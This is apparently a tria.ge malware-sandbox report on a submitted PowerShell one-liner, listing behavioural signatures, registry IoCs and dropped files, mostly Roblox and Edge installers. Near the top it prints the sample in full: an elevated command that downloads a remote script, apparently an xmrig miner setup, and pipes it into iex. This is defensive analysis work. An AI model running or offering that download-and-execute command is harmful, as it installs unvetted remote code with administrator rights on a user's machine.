Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
600s -
max time network
600s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
26/06/2024, 23:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Resource
win10-20240404-en
General
-
Target
http://start-process PowerShell -verb runas irm https://raw.githubusercontent.com/Lachine1/xmrig-scripts/main/windows.ps1 | iex
Malware Config
Signatures
-
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe MicrosoftEdgeUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation = "0" MicrosoftEdgeUpdate.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation msedgewebview2.exe Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation msedgewebview2.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 43 IoCs
pid Process 1852 RobloxPlayerInstaller.exe 1360 MicrosoftEdgeWebview2Setup.exe 4872 MicrosoftEdgeUpdate.exe 200 MicrosoftEdgeUpdate.exe 4056 MicrosoftEdgeUpdate.exe 3604 MicrosoftEdgeUpdateComRegisterShell64.exe 1168 MicrosoftEdgeUpdateComRegisterShell64.exe 4332 MicrosoftEdgeUpdateComRegisterShell64.exe 1400 MicrosoftEdgeUpdate.exe 2832 MicrosoftEdgeUpdate.exe 2780 MicrosoftEdgeUpdate.exe 1740 MicrosoftEdgeUpdate.exe 872 MicrosoftEdge_X64_126.0.2592.68.exe 2272 setup.exe 4720 setup.exe 1316 MicrosoftEdgeUpdate.exe 596 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4756 MicrosoftEdgeUpdate.exe 2464 MicrosoftEdgeUpdate.exe 4508 RobloxPlayerBeta.exe 1512 MicrosoftEdgeUpdateSetup_X86_1.3.187.41.exe 1732 MicrosoftEdgeUpdate.exe 3776 MicrosoftEdgeUpdate.exe 4424 MicrosoftEdgeUpdate.exe 520 MicrosoftEdgeUpdate.exe 1308 MicrosoftEdgeUpdateComRegisterShell64.exe 3120 MicrosoftEdgeUpdateComRegisterShell64.exe 872 MicrosoftEdgeUpdateComRegisterShell64.exe 3524 MicrosoftEdgeUpdate.exe 2732 RobloxStudioInstaller.exe 3876 RobloxStudioInstaller.exe 2372 RobloxStudioBeta.exe 4036 RobloxCrashHandler.exe 2764 msedgewebview2.exe 1432 msedgewebview2.exe 3348 msedgewebview2.exe 4024 msedgewebview2.exe 2560 msedgewebview2.exe 5336 msedgewebview2.exe 5740 msedgewebview2.exe 5964 msedgewebview2.exe -
Loads dropped DLL 64 IoCs
pid Process 4872 MicrosoftEdgeUpdate.exe 3604 MicrosoftEdgeUpdateComRegisterShell64.exe 4056 MicrosoftEdgeUpdate.exe 1168 MicrosoftEdgeUpdateComRegisterShell64.exe 4056 MicrosoftEdgeUpdate.exe 4332 MicrosoftEdgeUpdateComRegisterShell64.exe 4056 MicrosoftEdgeUpdate.exe 2780 MicrosoftEdgeUpdate.exe 2832 MicrosoftEdgeUpdate.exe 596 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 2464 MicrosoftEdgeUpdate.exe 4756 MicrosoftEdgeUpdate.exe 4508 RobloxPlayerBeta.exe 3776 MicrosoftEdgeUpdate.exe 1308 MicrosoftEdgeUpdateComRegisterShell64.exe 520 MicrosoftEdgeUpdate.exe 3120 MicrosoftEdgeUpdateComRegisterShell64.exe 520 MicrosoftEdgeUpdate.exe 872 MicrosoftEdgeUpdateComRegisterShell64.exe 520 MicrosoftEdgeUpdate.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 4036 RobloxCrashHandler.exe 4036 RobloxCrashHandler.exe 4036 RobloxCrashHandler.exe 2372 RobloxStudioBeta.exe 2372 RobloxStudioBeta.exe 2764 msedgewebview2.exe 1432 msedgewebview2.exe 2764 msedgewebview2.exe 2764 msedgewebview2.exe 4024 msedgewebview2.exe 3348 msedgewebview2.exe 2560 msedgewebview2.exe 3348 msedgewebview2.exe 2560 msedgewebview2.exe 4024 msedgewebview2.exe 5336 msedgewebview2.exe 4024 msedgewebview2.exe 4024 msedgewebview2.exe 4024 msedgewebview2.exe 5336 msedgewebview2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RobloxPlayerInstaller.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RobloxStudioInstaller.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA RobloxStudioBeta.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini bcastdvr.exe -
Checks system information in the registry 2 TTPs 18 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName MicrosoftEdgeUpdate.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer MicrosoftEdgeUpdate.exe -
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A MicrosoftEdgeUpdate.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 MicrosoftEdgeUpdate.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
pid Process 596 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 596 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 592 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4844 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe 4508 RobloxPlayerBeta.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\InspectMenu\[email protected] RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Light\Standard\LocalFile.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\roblox_networking-chat\networking-chat\networkRequests\createSendGameLinkMessage.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\UGCValidation\UGCValidation\util\BundlesMetadata.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\AnimationEditor\FaceCaptureUI\CloseButton.png RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\TerrainEditor\Light\Standard\Locked.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\NextDataExpirationTimeRodux\Dev\JestGlobals.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\Controls\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Components\Connection\LayoutValuesContext.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\DevConsole\Components\DebugVisualizations\DebugVisualizationsChart.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\InGameMenu\Components\Pages\Dialog\LeavePrompt.spec.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\ExtraContent\textures\ui\Controls\DesignSystem\[email protected] RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameDetailRodux\Http.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\DeveloperFramework\StudioTheme\clear.png RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Scripting\Light\Standard\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\Controls\DesignSystem\[email protected] RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Test\MockExternalSettings.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\TerrainEditor\Light\Large\Fill.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Light\Standard\TerrainDetail.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestConfig\JestConfig\constants.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\RoduxPresence-50d7e209-c2fcb3b0\RoduxPresence\Models\PresenceModel.lua RobloxStudioInstaller.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\resources.pak setup.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\CompositorDebugger\blend2d.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\ui\Controls\PlayStationController\DPadUp.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\ImportPreview\Light\Large\CameraReset.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Light\Standard\RibbonUpdateSmall.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\AppChat\Analytics.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\SwimController.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PurchasePrompt\Flags\GetFFlagEnablePromptPurchaseRequestedV2Take2.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\llama\llama\Dictionary\some.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\DeveloperStorybook\ToolbarIcon.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\textures\ui\LuaApp\graphic\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\ToastNotification\RobloxAppHooks.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\RibbonTextButton.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\WidgetIcons\Light\Large\AccessoryFittingTool.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestUtil-3.8.0\JestUtil\replacePathSepForGlob.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\Merge\Merge\typedefs-mergers\merge-nodes.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\UserSafetyTestSuite\UserSafetyTestSuite\default.rbxp RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\CoreScripts\PlayerBillboards.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\Ribbon\Dark\Medium\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\DomTestingLibrary\DomTestingLibrary\queries\init.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\particles\fire_main.dds RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\Terrain\Dark\Large\TerrainBrushTypeCylinder.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Lua\Terrain\Light\Large\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\LuauPolyfill-1.2.3\LuauPolyfill\Error\Error.global.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\scripts\CoreScripts\Modules\PlayerList\Components\Connection\LayoutValuesContext.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\roblox_lumberyak\lumberyak\example\app\appLogger.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\InvisibleMode\Dev\SocialTestHelpers.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\TenFootUiTesting\RoactNavigation.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\UGCValidation\UGCValidation\Constants.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\loading\robloxlogo.png RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\JestEach-3.8.0\JestEach\nilPlaceholder.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Workspace\Packages\_Workspace\GameTile\Dev\JestGlobals.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\Debugger\Breakpoints\[email protected] RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-6b63ea89d2e54fd7\content\textures\ui\Controls\XboxController\[email protected] RobloxPlayerInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\WidgetIcons\Light\Large\[email protected] RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\ExtraContent\LuaPackages\Packages\_Index\SocialLibraries\SocialLibraries\temp\User.lua RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\textures\StudioSharedUI\alert_error_withbg.png RobloxStudioInstaller.exe File created C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\content\studio_svg_textures\Shared\InsertableObjects\Dark\Standard\[email protected] RobloxStudioInstaller.exe -
Drops file in Windows directory 8 IoCs
description ioc Process File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 1640 LaunchWinApp.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 10 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 GamePanel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 GamePanel.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags GamePanel.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags GamePanel.exe -
